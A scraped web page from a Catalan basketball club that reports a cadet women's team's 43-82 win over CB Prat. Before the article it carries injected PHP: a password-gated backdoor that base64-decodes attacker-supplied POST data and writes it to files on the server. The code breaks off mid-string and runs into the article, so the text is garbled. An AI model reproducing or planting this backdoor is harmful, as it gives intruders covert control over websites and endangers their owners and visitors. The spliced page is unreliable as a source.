function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El cadet femení 04 A surt en tromba i derrota el CB Prat (43-82) - Tgn Bàsquet Club -

El cadet femení 04 A surt en tromba i derrota el CB Prat (43-82)

Updated: octubre 16, 2018

El cadet femení 04 A es va refer de la derrota de la setmana passada contra el Joventut de Badalona amb un triomf balsàmic contra el CB Prat. Les noies que entrena Albert del Rey van prendre nota de la seva fluixa defensa de la jornada anterior i van sortir molt intenses, un fet que es demostra en els resultats al final del primer quart i al descans (6-24 i 13-48). La relaxació de les liles en la segona meitat va permetre les locals igualar el joc i evitar una derrota més gran.